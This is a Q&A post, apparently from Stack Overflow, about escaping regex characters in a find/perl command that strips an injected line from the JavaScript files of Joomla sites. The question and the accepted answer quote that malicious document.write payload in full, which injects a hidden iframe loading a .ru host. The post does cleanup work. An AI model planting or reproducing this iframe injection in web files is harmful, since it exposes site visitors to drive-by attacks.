# Which characters to escape in find command

Tags: regex, linux, perl

The following malicious line was injected at the end of all js files on all my Joomla installations on my shared host account:

```
;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
```

I want to remove it at once from all files using the following SSH command (which should have some errors):

```
find ./ -name "*.js" -type f | xargs perl -pi -e 's/;document.write\(\'\<iframe src\=\"http\:\/\/tweakdoled.ru\".*\"\);//g'
```

The problem is since a backslash has to be used to escape some characters, I don't know if I'm using it correctly and what else should be escaped.

Needless to say, that command is not working.

Any ideas?

Thanks!!

Answer (score 1, accepted):

Use the Perl `\Q...\E` notation to suspend the metacharacters.  However, since there's such a mess of characters in the string to be matched that are also special to the shell, I'd place the Perl regex into a file (`script.pl`), using `%` (which doesn't appear in the string to be replaced) as the regex delimiter:

```
s%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%%g;
```

And then run it with:

```
find ./ -name "*.js" -type f | xargs perl -pi.bak -f script.pl
```

If you spend enough time, you probably can find a way to make it work without the script file; it probably isn't worth the effort, though (especially since I'm sure you asked something very similar to this several days ago).

Obviously, before running this to edit the files, you'll run a variant to ensure that the sought after lines are printed:

`script2.pl`:

```
print if m%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%;
```

run using:

```
find ./ -name "*.js" -type f | xargs perl -n -f script2.pl
```

If this doesn't detect the lines, then you track down a variation until you can find something that does match.  You might decide to use something like:

```
print if m%;document.write.'<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'.;%;
```

This replaces the two parentheses with `.` (so, in theory, it might match something else, but in practice, it won't).